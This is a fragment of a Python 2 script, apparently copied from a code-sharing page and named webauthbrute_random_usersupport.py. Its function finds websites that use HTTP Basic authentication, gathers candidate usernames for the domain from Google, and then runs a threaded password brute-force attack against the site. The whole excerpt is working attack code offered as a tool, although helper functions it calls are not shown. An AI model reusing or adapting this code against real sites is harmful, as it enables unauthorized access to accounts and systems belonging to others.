webauthbrute_random_usersupport.py 文件源码

def getauth(site, users):

    print "[-] Checking Authentication:",site
    global hits
    try:
        req = urllib2.Request(site)
        handle = urllib2.urlopen(req)
        if site in urls:
            print "Removing:",site
            urls.remove(site)
    except(IOError,urllib2.URLError,urllib2.HTTPError,httplib.BadStatusLine,socket.error), msg:
            print "\t- Got:",msg,"\n"
            try:
                if hasattr(msg, 'code') or msg.code == 401:
                    authline = msg.headers.get('www-authenticate', '')
                    if authline:
                        print "[+]",authline
                        print "[+] Found site using basic authentication"
                        domain = site[7:].split("/",3)[0]
                        print "[+] Collecting users from Google:",domain,"\n"
                        getusers(domain)
                        print "[+] Attempting Brute Force on",site,"\n"
                        hits +=1
                        for i in range(len(words)*len(users)):
                            work = threading.Thread()
                            work.setDaemon(1)
                            work.start()
                            threader(site)
                            time.sleep(1)
                        print len(users)
                        print "[+] Removing last collected users\n"
                        users = users[:-int(erase)]
                        print len(users)
            except(AttributeError):
                pass
    else: 
        print "\t- Got: 200\n"